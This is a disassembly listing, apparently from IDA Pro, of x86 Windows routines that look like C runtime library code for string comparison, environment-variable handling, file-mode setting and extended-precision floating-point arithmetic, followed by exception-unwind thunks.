; Attributes: bp-based frame
sub_435A15 proc near ; CODE XREF: sub_434B4A+27�p
var_3C = dword ptr -3Ch
var_36 = byte ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437F38
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
cmp dword_676C6C, ebx
push 1
pop edi
jnz short loc_435A88
push edi
mov eax, offset dword_437670
push eax
push edi
push eax
push ebx
push ebx
call dword_43719C ; CompareStringW
test eax, eax
jz short loc_435A65
mov dword_676C6C, edi
jmp short loc_435A88
; ---------------------------------------------------------------------------
loc_435A65: ; CODE XREF: sub_435A15+46�j
push edi
mov eax, offset word_454018
push eax
push edi
push eax
push ebx
push ebx
call dword_4371A0 ; CompareStringA
test eax, eax
jz loc_435C7E
mov dword_676C6C, 2
loc_435A88: ; CODE XREF: sub_435A15+31�j
; sub_435A15+4E�j
mov esi, [ebp+arg_C]
cmp esi, ebx
jle short loc_435A9F
push esi
push [ebp+arg_8]
call sub_435C92
pop ecx
pop ecx
mov esi, eax
mov [ebp+arg_C], esi
loc_435A9F: ; CODE XREF: sub_435A15+78�j
cmp [ebp+arg_14], ebx
jle short loc_435AB4
push [ebp+arg_14]
push [ebp+arg_10]
call sub_435C92
pop ecx
pop ecx
mov [ebp+arg_14], eax
loc_435AB4: ; CODE XREF: sub_435A15+8D�j
mov eax, dword_676C6C
cmp eax, 2
jnz short loc_435AD9
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4371A0 ; CompareStringA
jmp loc_435C80
; ---------------------------------------------------------------------------
loc_435AD9: ; CODE XREF: sub_435A15+A7�j
cmp eax, edi
jnz loc_435C7E
cmp [ebp+arg_18], ebx
jnz short loc_435AEE
mov eax, dword_676998
mov [ebp+arg_18], eax
loc_435AEE: ; CODE XREF: sub_435A15+CF�j
cmp esi, ebx
jz short loc_435AFB
cmp [ebp+arg_14], ebx
jnz loc_435B93
loc_435AFB: ; CODE XREF: sub_435A15+DB�j
cmp esi, [ebp+arg_14]
jnz short loc_435B08
loc_435B00: ; CODE XREF: sub_435A15+13C�j
; sub_435A15+16D�j
push 2
loc_435B02: ; CODE XREF: sub_435A15+146�j
pop eax
jmp loc_435C80
; ---------------------------------------------------------------------------
loc_435B08: ; CODE XREF: sub_435A15+E9�j
cmp [ebp+arg_14], edi
jle short loc_435B14
loc_435B0D: ; CODE XREF: sub_435A15+151�j
; sub_435A15+159�j ...
mov eax, edi
jmp loc_435C80
; ---------------------------------------------------------------------------
loc_435B14: ; CODE XREF: sub_435A15+F6�j
cmp esi, edi
jg short loc_435B59
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_18]
call dword_4371D4 ; GetCPInfo
test eax, eax
jz loc_435C7E
cmp esi, ebx
jle short loc_435B5D
cmp [ebp+var_3C], 2
jb short loc_435B59
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_435B59
loc_435B3F: ; CODE XREF: sub_435A15+142�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_435B59
mov ecx, [ebp+arg_8]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_435B53
cmp cl, dl
jbe short loc_435B00
loc_435B53: ; CODE XREF: sub_435A15+138�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_435B3F
loc_435B59: ; CODE XREF: sub_435A15+101�j
; sub_435A15+120�j ...
push 3
jmp short loc_435B02
; ---------------------------------------------------------------------------
loc_435B5D: ; CODE XREF: sub_435A15+11A�j
cmp [ebp+arg_14], ebx
jle short loc_435B93
cmp [ebp+var_3C], 2
jb short loc_435B0D
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_435B0D
loc_435B70: ; CODE XREF: sub_435A15+177�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_435B0D
mov ecx, [ebp+arg_10]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_435B88
cmp cl, dl
jbe loc_435B00
loc_435B88: ; CODE XREF: sub_435A15+169�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_435B70
jmp loc_435B0D
; ---------------------------------------------------------------------------
loc_435B93: ; CODE XREF: sub_435A15+E0�j
; sub_435A15+14B�j
push ebx
push ebx
push esi
push [ebp+arg_8]
push 9
push [ebp+arg_18]
call dword_437180 ; MultiByteToWideChar
mov [ebp+var_1C], eax
cmp eax, ebx
jz loc_435C7E
mov [ebp+var_4], ebx
add eax, eax
add eax, 3
and al, 0FCh
call sub_429A90
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_435BE2
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+arg_C]
push 1
pop edi
loc_435BE2: ; CODE XREF: sub_435A15+1B5�j
cmp [ebp+var_24], ebx
jz loc_435C7E
push [ebp+var_1C]
push [ebp+var_24]
push esi
push [ebp+arg_8]
push edi
push [ebp+arg_18]
mov esi, dword_437180
call esi ; dword_437180
test eax, eax
jz short loc_435C7E
push ebx
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push 9
push [ebp+arg_18]
call esi ; dword_437180
mov esi, eax
mov [ebp+var_20], esi
cmp esi, ebx
jz short loc_435C7E
mov [ebp+var_4], edi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_429A90
mov [ebp+var_18], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_435C4D
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor edi, edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_20]
loc_435C4D: ; CODE XREF: sub_435A15+224�j
cmp edi, ebx
jz short loc_435C7E
push esi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push 1
push [ebp+arg_18]
call dword_437180 ; MultiByteToWideChar
test eax, eax
jz short loc_435C7E
push esi
push edi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_43719C ; CompareStringW
jmp short loc_435C80
; ---------------------------------------------------------------------------
loc_435C7E: ; CODE XREF: sub_435A15+63�j
; sub_435A15+C6�j ...
xor eax, eax
loc_435C80: ; CODE XREF: sub_435A15+BF�j
; sub_435A15+EE�j ...
lea esp, [ebp-4Ch]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_435A15 endp
; =============== S U B R O U T I N E =======================================
sub_435C92 proc near ; CODE XREF: sub_430CCF+81�p
; sub_435A15+7E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_435CAF
loc_435CA2: ; CODE XREF: sub_435C92+1B�j
cmp byte ptr [eax], 0
jz short loc_435CAF
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_435CA2
loc_435CAF: ; CODE XREF: sub_435C92+E�j
; sub_435C92+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_435CBA
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_435CBA: ; CODE XREF: sub_435C92+21�j
mov eax, edx
retn
sub_435C92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435CBD proc near ; CODE XREF: sub_434B89+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_0], edi
jz short loc_435D21
push 3Dh
push [ebp+arg_0]
call sub_4346C4
mov esi, eax
pop ecx
cmp esi, edi
pop ecx
mov [ebp+var_8], esi
jz short loc_435D21
cmp [ebp+arg_0], esi
jz short loc_435D21
mov eax, dword_6769CC
xor ebx, ebx
cmp [esi+1], bl
setz bl
cmp eax, dword_6769D0
jnz short loc_435D07
push eax
call sub_435E9C
pop ecx
mov dword_6769CC, eax
loc_435D07: ; CODE XREF: sub_435CBD+3C�j
cmp eax, edi
jnz short loc_435D5F
cmp [ebp+arg_4], edi
jz short loc_435D29
cmp dword_6769D4, edi
jz short loc_435D29
call sub_434B89
test eax, eax
jz short loc_435D5F
loc_435D21: ; CODE XREF: sub_435CBD+D�j
; sub_435CBD+22�j ...
or eax, 0FFFFFFFFh
loc_435D24: ; CODE XREF: sub_435CBD+182�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_435D29: ; CODE XREF: sub_435CBD+51�j
; sub_435CBD+59�j
cmp ebx, edi
jnz loc_435E3D
push 4
call sub_4296E8
cmp eax, edi
pop ecx
mov dword_6769CC, eax
jz short loc_435D21
mov [eax], edi
cmp dword_6769D4, edi
jnz short loc_435D5F
push 4
call sub_4296E8
cmp eax, edi
pop ecx
mov dword_6769D4, eax
jz short loc_435D21
mov [eax], edi
loc_435D5F: ; CODE XREF: sub_435CBD+4C�j
; sub_435CBD+62�j ...
sub esi, [ebp+arg_0]
mov edi, dword_6769CC
mov [ebp+var_4], edi
push esi
push [ebp+arg_0]
call sub_435E44
mov esi, eax
pop ecx
test esi, esi
pop ecx
jl short loc_435DBF
cmp dword ptr [edi], 0
jz short loc_435DBF
test ebx, ebx
jz short loc_435DB7
push dword ptr [edi+esi*4]
lea edi, [edi+esi*4]
call sub_429822
pop ecx
loc_435D91: ; CODE XREF: sub_435CBD+E2�j
cmp dword ptr [edi], 0
jz short loc_435DA1
mov eax, [edi+4]
inc esi
mov [edi], eax
add edi, 4
jmp short loc_435D91
; ---------------------------------------------------------------------------
loc_435DA1: ; CODE XREF: sub_435CBD+D7�j
mov eax, esi
shl eax, 2
push eax
push [ebp+var_4]
call sub_431BB3
pop ecx
test eax, eax
pop ecx
jz short loc_435DF1
jmp short loc_435DEC
; ---------------------------------------------------------------------------
loc_435DB7: ; CODE XREF: sub_435CBD+C6�j
mov eax, [ebp+arg_0]
mov [edi+esi*4], eax
jmp short loc_435DF1
; ---------------------------------------------------------------------------
loc_435DBF: ; CODE XREF: sub_435CBD+BD�j
; sub_435CBD+C2�j
test ebx, ebx
jnz short loc_435E3D
test esi, esi
jge short loc_435DC9
neg esi
loc_435DC9: ; CODE XREF: sub_435CBD+108�j
lea eax, ds:8[esi*4]
push eax
push edi
call sub_431BB3
pop ecx
test eax, eax
pop ecx
jz loc_435D21
mov ecx, [ebp+arg_0]
mov [eax+esi*4], ecx
and dword ptr [eax+esi*4+4], 0
loc_435DEC: ; CODE XREF: sub_435CBD+F8�j
mov dword_6769CC, eax
loc_435DF1: ; CODE XREF: sub_435CBD+F6�j
; sub_435CBD+100�j
cmp [ebp+arg_4], 0
jz short loc_435E3D
push [ebp+arg_0]
call sub_4292D0
inc eax
inc eax
push eax
call sub_4296E8
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_435E3D
push [ebp+arg_0]
push esi
call sub_42A500
mov eax, esi
pop ecx
sub eax, [ebp+arg_0]
pop ecx
add eax, [ebp+var_8]
and byte ptr [eax], 0
inc eax
neg ebx
sbb ebx, ebx
not ebx
and ebx, eax
push ebx
push esi
call dword_437198 ; SetEnvironmentVariableA
push esi
call sub_429822
pop ecx
loc_435E3D: ; CODE XREF: sub_435CBD+6E�j
; sub_435CBD+104�j ...
xor eax, eax
jmp loc_435D24
sub_435CBD endp
; =============== S U B R O U T I N E =======================================
sub_435E44 proc near ; CODE XREF: sub_435CBD+B2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, dword_6769CC
push edi
mov eax, [esi]
test eax, eax
jz short loc_435E7F
mov edi, [esp+8+arg_4]
loc_435E56: ; CODE XREF: sub_435E44+39�j
push edi
push eax
push [esp+10h+arg_0]
call sub_434B4A
add esp, 0Ch
test eax, eax
jnz short loc_435E75
mov eax, [esi]
mov al, [eax+edi]
cmp al, 3Dh
jz short loc_435E8F
test al, al
jz short loc_435E8F
loc_435E75: ; CODE XREF: sub_435E44+22�j
mov eax, [esi+4]
add esi, 4
test eax, eax
jnz short loc_435E56
loc_435E7F: ; CODE XREF: sub_435E44+C�j
mov eax, esi
sub eax, dword_6769CC
sar eax, 2
neg eax
loc_435E8C: ; CODE XREF: sub_435E44+56�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_435E8F: ; CODE XREF: sub_435E44+2B�j
; sub_435E44+2F�j
mov eax, esi
sub eax, dword_6769CC
sar eax, 2
jmp short loc_435E8C
sub_435E44 endp
; =============== S U B R O U T I N E =======================================
sub_435E9C proc near ; CODE XREF: sub_435CBD+3F�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor ecx, ecx
test edi, edi
jnz short loc_435EAB
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_435EAB: ; CODE XREF: sub_435E9C+9�j
cmp dword ptr [edi], 0
lea eax, [edi+4]
jz short loc_435EBD
loc_435EB3: ; CODE XREF: sub_435E9C+1F�j
mov edx, [eax]
inc ecx
add eax, 4
test edx, edx
jnz short loc_435EB3
loc_435EBD: ; CODE XREF: sub_435E9C+15�j
push ebx
push ebp
lea eax, ds:4[ecx*4]
push esi
push eax
call sub_4296E8
mov esi, eax
pop ecx
test esi, esi
mov ebp, esi
jnz short loc_435EDE
push 9
call sub_42C5AC
pop ecx
loc_435EDE: ; CODE XREF: sub_435E9C+38�j
mov eax, [edi]
mov ebx, edi
loc_435EE2: ; CODE XREF: sub_435E9C+5B�j
test eax, eax
jz short loc_435EF9
push eax
add ebx, 4
call sub_436200
mov [esi], eax
mov eax, [ebx]
pop ecx
add esi, 4
jmp short loc_435EE2
; ---------------------------------------------------------------------------
loc_435EF9: ; CODE XREF: sub_435E9C+48�j
and dword ptr [esi], 0
mov eax, ebp
pop esi
pop ebp
pop ebx
pop edi
retn
sub_435E9C endp
; =============== S U B R O U T I N E =======================================
sub_435F03 proc near ; CODE XREF: sub_434D29+68�p
; sub_434D29+B9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea eax, [eax+eax*8]
mov esi, 8000h
mov ecx, dword_676EC0[ecx*4]
lea edx, [ecx+eax*4+4]
mov cl, [ecx+eax*4+4]
mov al, cl
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_435F39
and cl, 7Fh
jmp short loc_435F46
; ---------------------------------------------------------------------------
loc_435F39: ; CODE XREF: sub_435F03+2F�j
cmp [esp+4+arg_4], 4000h
jnz short loc_435F54
or cl, 80h
loc_435F46: ; CODE XREF: sub_435F03+34�j
neg eax
sbb eax, eax
mov [edx], cl
and ax, 0C000h
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_435F54: ; CODE XREF: sub_435F03+3E�j
call sub_42F049
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
pop esi
retn
sub_435F03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435F64 proc near ; CODE XREF: sub_435782+165�p
; sub_436184+69�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov cx, [ebx+0Ah]
xor eax, eax
push edi
mov [ebp+var_14], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
mov ax, [esi+0Ah]
mov edi, ecx
mov edx, 7FFFh
xor edi, eax
and eax, edx
and ecx, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_436164
cmp cx, 7FFFh
jnb loc_436164
cmp dx, 0BFFDh
ja loc_436164
cmp dx, 3FBFh
ja short loc_435FCD
xor eax, eax
jmp short loc_436007
; ---------------------------------------------------------------------------
loc_435FCD: ; CODE XREF: sub_435F64+63�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_435FEF
inc [ebp+arg_0]
test [esi+8], edx
jnz short loc_435FEF
xor eax, eax
cmp [esi+4], eax
jnz short loc_435FF1
cmp [esi], eax
jnz short loc_435FF1
jmp loc_43615E
; ---------------------------------------------------------------------------
loc_435FEF: ; CODE XREF: sub_435F64+71�j
; sub_435F64+79�j
xor eax, eax
loc_435FF1: ; CODE XREF: sub_435F64+80�j
; sub_435F64+84�j
cmp cx, ax
jnz short loc_436014
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_436014
cmp [ebx+4], eax
jnz short loc_436014
cmp [ebx], eax
jnz short loc_436014
loc_436007: ; CODE XREF: sub_435F64+67�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_43617F
; ---------------------------------------------------------------------------
loc_436014: ; CODE XREF: sub_435F64+90�j
; sub_435F64+98�j ...
mov [ebp+var_10], eax
lea eax, [ebp+var_20]
mov [ebp+var_4], eax
mov [ebp+arg_4], 5
loc_436024: ; CODE XREF: sub_435F64+122�j
mov eax, [ebp+var_10]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_436078
add eax, esi
lea ecx, [ebx+8]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], ecx
mov [ebp+var_18], eax
loc_436040: ; CODE XREF: sub_435F64+112�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
movzx eax, word ptr [eax]
movzx ecx, word ptr [ecx]
imul eax, ecx
mov ecx, [ebp+var_4]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_435110
add esp, 0Ch
test eax, eax
jz short loc_43606B
mov eax, [ebp+var_4]
inc word ptr [eax]
loc_43606B: ; CODE XREF: sub_435F64+FF�j
add [ebp+var_8], 2
sub [ebp+var_C], 2
dec [ebp+var_18]
jnz short loc_436040
loc_436078: ; CODE XREF: sub_435F64+C9�j
add [ebp+var_4], 2
inc [ebp+var_10]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_436024
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_4360BB
loc_436096: ; CODE XREF: sub_435F64+14E�j
test byte ptr [ebp+var_1C+3], 80h
jnz short loc_4360B4
lea eax, [ebp+var_24]
push eax
call sub_43518F
add [ebp+arg_0], 0FFFFh
pop ecx
cmp word ptr [ebp+arg_0], 0
jg short loc_436096
loc_4360B4: ; CODE XREF: sub_435F64+136�j
cmp word ptr [ebp+arg_0], 0
jg short loc_4360F4
loc_4360BB: ; CODE XREF: sub_435F64+130�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_4360F4
movsx eax, word ptr [ebp+arg_0]
neg eax
add [ebp+arg_0], eax
mov ebx, eax
loc_4360D4: ; CODE XREF: sub_435F64+184�j
test byte ptr [ebp+var_24], 1
jz short loc_4360DD
inc [ebp+var_14]
loc_4360DD: ; CODE XREF: sub_435F64+174�j
lea eax, [ebp+var_24]
push eax
call sub_4351BD
dec ebx
pop ecx
jnz short loc_4360D4
cmp [ebp+var_14], 0
jz short loc_4360F4
or byte ptr [ebp+var_24], 1
loc_4360F4: ; CODE XREF: sub_435F64+155�j
; sub_435F64+163�j ...
cmp word ptr [ebp+var_24], 8000h
ja short loc_43610B
mov eax, [ebp+var_24]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_436140
loc_43610B: ; CODE XREF: sub_435F64+196�j
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_43613D
and [ebp+var_24+2], 0
cmp [ebp+var_20+2], 0FFFFFFFFh
jnz short loc_436138
and [ebp+var_20+2], 0
cmp word ptr [ebp+var_1C+2], 0FFFFh
jnz short loc_436132
inc [ebp+arg_0]
mov word ptr [ebp+var_1C+2], 8000h
jmp short loc_436140
; ---------------------------------------------------------------------------
loc_436132: ; CODE XREF: sub_435F64+1C1�j
inc word ptr [ebp+var_1C+2]
jmp short loc_436140
; ---------------------------------------------------------------------------
loc_436138: ; CODE XREF: sub_435F64+1B5�j
inc [ebp+var_20+2]
jmp short loc_436140
; ---------------------------------------------------------------------------
loc_43613D: ; CODE XREF: sub_435F64+1AB�j
inc [ebp+var_24+2]
loc_436140: ; CODE XREF: sub_435F64+1A5�j
; sub_435F64+1CC�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_436164
mov cx, word ptr [ebp+var_24+2]
or eax, edi
mov [esi], cx
mov ecx, [ebp+var_20]
mov [esi+2], ecx
mov ecx, [ebp+var_1C]
mov [esi+6], ecx
loc_43615E: ; CODE XREF: sub_435F64+86�j
mov [esi+0Ah], ax
jmp short loc_43617F
; ---------------------------------------------------------------------------
loc_436164: ; CODE XREF: sub_435F64+42�j
; sub_435F64+4D�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_43617F: ; CODE XREF: sub_435F64+AB�j
; sub_435F64+1FE�j
pop edi
pop esi
pop ebx
leave
retn
sub_435F64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_436184 proc near ; CODE XREF: sub_4352B1+440�p
; sub_435782+14C�p
var_C = byte ptr -0Ch
var_A = dword ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ebx, offset dword_453D50
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
jz short loc_4361FD
jge short loc_4361AC
mov eax, [ebp+arg_4]
mov ebx, offset dword_453EB0
neg eax
mov [ebp+arg_4], eax
sub ebx, 60h
loc_4361AC: ; CODE XREF: sub_436184+16�j
cmp [ebp+arg_8], ecx
jnz short loc_4361B7
mov eax, [ebp+arg_0]
mov [eax], cx
loc_4361B7: ; CODE XREF: sub_436184+2B�j
cmp [ebp+arg_4], ecx
jz short loc_4361FD
push esi
push edi
loc_4361BE: ; CODE XREF: sub_436184+75�j
mov eax, [ebp+arg_4]
add ebx, 54h
sar [ebp+arg_4], 3
and eax, 7
cmp eax, ecx
jz short loc_4361F6
lea eax, [eax+eax*2]
cmp word ptr [ebx+eax*4], 8000h
lea esi, [ebx+eax*4]
jb short loc_4361E9
lea edi, [ebp+var_C]
movsd
movsd
movsd
dec [ebp+var_A]
lea esi, [ebp+var_C]
loc_4361E9: ; CODE XREF: sub_436184+57�j
push esi
push [ebp+arg_0]
call sub_435F64
pop ecx
pop ecx
xor ecx, ecx
loc_4361F6: ; CODE XREF: sub_436184+49�j
cmp [ebp+arg_4], ecx
jnz short loc_4361BE
pop edi
pop esi
loc_4361FD: ; CODE XREF: sub_436184+14�j
; sub_436184+36�j
pop ebx
leave
retn
sub_436184 endp
; =============== S U B R O U T I N E =======================================
sub_436200 proc near ; CODE XREF: sub_427931+21�p
; sub_435E9C+4E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_436227
push esi
call sub_4292D0
inc eax
push eax
call sub_4296E8
pop ecx
test eax, eax
pop ecx
jz short loc_436227
push esi
push eax
call sub_42A500
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_436227: ; CODE XREF: sub_436200+7�j
; sub_436200+1A�j
xor eax, eax
pop esi
retn
sub_436200 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_436230 proc near ; CODE XREF: sub_42ABFC+13�p
; sub_42B457+23�p
jmp dword_43722C
sub_436230 endp
; ---------------------------------------------------------------------------
align 4
push dword ptr [ebp-10h]
call sub_429006
pop ecx
retn
; ---------------------------------------------------------------------------
loc_436242: ; DATA XREF: sub_4154E4�o
mov eax, offset dword_438120
jmp loc_42B4A6
; ---------------------------------------------------------------------------
lea ecx, [ebp-24h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
loc_436254: ; DATA XREF: sub_419797�o
mov eax, offset dword_438144
jmp loc_42B4A6
; ---------------------------------------------------------------------------
align 10h
loc_436260: ; DATA XREF: .text:0043816C�o
lea ecx, [ebp-24h]
jmp sub_41B0D8
; ---------------------------------------------------------------------------
lea ecx, [ebp-34h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
and eax, 1
test eax, eax
jz locret_436286
mov ecx, [ebp+8]
jmp sub_4195C9
; ---------------------------------------------------------------------------
locret_436286: ; CODE XREF: .text:00436278�j
retn
; ---------------------------------------------------------------------------
loc_436287: ; DATA XREF: sub_41984D�o
mov eax, offset dword_438178
jmp loc_42B4A6
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-1Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
loc_43629C: ; DATA XREF: sub_419A4B�o
mov eax, offset dword_43819C
jmp loc_42B4A6
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-1Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
loc_4362B0: ; DATA XREF: .text:004381C4�o
lea ecx, [ebp-3Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
loc_4362B8: ; DATA XREF: .text:004381CC�o
lea ecx, [ebp-3Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
loc_4362C0: ; DATA XREF: .text:004381D4�o
lea ecx, [ebp-5Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-4Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-3Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
loc_4362D8: ; DATA XREF: .text:004381EC�o
lea ecx, [ebp-3Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-4Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
loc_4362E8: ; DATA XREF: .text:004381FC�o
lea ecx, [ebp-3Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-4Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-5Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
loc_436300: ; DATA XREF: .text:00438214�o
lea ecx, [ebp-3Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-4Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-5Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
loc_436318: ; DATA XREF: .text:0043822C�o
lea ecx, [ebp-4Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-5Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
loc_436328: ; DATA XREF: .text:0043823C�o
lea ecx, [ebp-4Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
loc_436330: ; DATA XREF: .text:00438244�o
lea ecx, [ebp-2Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-5Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-5Ch]
jmp sub_4195C9
; ---------------------------------------------------------------------------
loc_436348: ; DATA XREF: sub_419B88�o
mov eax, offset dword_438258
jmp loc_42B4A6
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-1F4h]
jmp sub_41B0AD
; ---------------------------------------------------------------------------
loc_43635F: ; DATA XREF: .text:00438280�o
lea ecx, [ebp-30h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-0CCh]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-0ACh]
jmp sub_41B0AD
; ---------------------------------------------------------------------------
lea ecx, [ebp-0F0h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-44h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-0BCh]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-58h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-394h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-374h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-204h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-384h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-110h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-304h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-244h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
lea ecx, [ebp-264h]
jmp sub_4195C9
; ---------------------------------------------------------------------------
